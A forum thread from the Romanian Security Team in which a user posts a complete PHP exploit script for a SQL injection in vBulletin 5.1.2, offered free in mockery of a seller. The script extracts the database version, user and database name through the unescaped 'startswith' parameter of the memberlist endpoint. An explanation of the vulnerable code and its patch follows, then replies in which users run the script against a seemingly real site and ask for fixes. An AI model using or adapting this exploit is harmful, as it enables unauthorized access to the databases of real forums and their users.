Jump to content
Nytro

[RST] vBulletin 5.1.2 SQL Injection Exploit

Recommended Posts

Some idiots are trying to sell it:

http://1337day.com/exploits/22452

For 2000 $. Gay :))

Here it is. Free. :)

[phpcode]<?php

/*
Author: Nytro
Powered by: Romanian Security Team
Price: Free. Educational.
*/


error_reporting(E_ALL);
ini_set('display_errors', 1);


// Get arguments


$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);


// Function to send a POST request


function httpPost($url,$params)
{
$ch = curl_init($url);


curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Accept: application/json, text/javascript, */*; q=0.01',
'X-Requested-With: XMLHttpRequest',
'Referer: https://rstforums.com/v5/memberlist',
'Accept-Language: en-US,en;q=0.5',
'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
));


$output = curl_exec($ch);

if($output == FALSE) print htmlspecialchars(curl_error($ch));


curl_close($ch);
return $output;
}


// Function to get string between two other strings


function get_string_between($string, $start, $end)
{
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}


// Get version


print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];

$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get user


print "\r\nUser: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


// Get database


print "\r\nDatabse: ";


$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),1,1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');


$letter = 1;


while(strpos($result, 'No Users Matched Your Query') == false)
{
$exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);


$username = get_string_between($exploded[1], '">', '<\/a>');
print $username[0];


$letter++;
$result = httpPost($target_url . '/ajax/render/memberlist_items',
'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),' . $letter . ',1)--+"+' .
'&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
}


print "\r\n"


?>[/phpcode]

More details:

The query was the following:

SELECT
user.userid, user.username, user.usergroupid AS usergroupid, user.lastactivity, user.options,
user.posts, user.joindate, user.usertitle,user.reputation,
session.lastactivity AS lastvisit,
IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, infractiongroupid, user.usergroupid
FROM user AS user
LEFT JOIN session AS session ON session.userid = user.userid
WHERE user.username LIKE "[B][COLOR=#ff0000]D[/COLOR][/B]%"
GROUP BY user.userid
ORDER BY user.username ASC
LIMIT 0, 10;

The "D" is the controlled parameter. And, the quote (") was NOT escaped.

The query was generated with a function from querydefs.php:

public function fetchMemberList($params, $db, $check_only = false)

The vulnerable code:

            if (!empty($params['startswith']))

{

if ($params['startswith'] == '#')

{

$where[] = 'user.username REGEXP "^[^a-z].?"';

}

else

{

$where[] = 'user.username LIKE "' . $params['startswith'] . '%"';

}

}

And the patch contains the fix:

            if (!empty($params['startswith']))

{

if ($params['startswith'] == '#')

{

$where[] = 'user.username REGEXP "^[^a-z].?"';

}

else

{

$where[] = 'user.username LIKE "' . $db->escape_string_like($params['startswith']) . '%"';

}

}

So now, the value is escaped and SQL Injection is fixed.

vBulletin team moved really fast in fixing this problem.

More info: https://rstforums.com/forum/86951-rst-vbulletin-5-1-2-sql-injection.rst

Edited by Nytro
Link to comment
Share on other sites

Am incercat si eu pe 5.1.2, dar primesc o eroare:

Notice: Undefined variable: username in /root/nytro.php on line 90
PHP Notice: Undefined variable: username in /root/nytro.php on line 91

L.E: cred ca tine de link'ul in care se face "injectia" ...

Edited by nacks
Link to comment
Share on other sites

root@bt:~/Desktop# php vbnew.php http://forum.vullsite.com/

Romanian Security Team - vBulltin 5.1.2 SQL Injection

Version: PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

PHP Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

Notice: Undefined offset: 1 in /root/Desktop/vbnew.php on line 92

PHP Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

Notice: Uninitialized string offset: 0 in /root/Desktop/vbnew.php on line 93

how fix mr Nytro ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...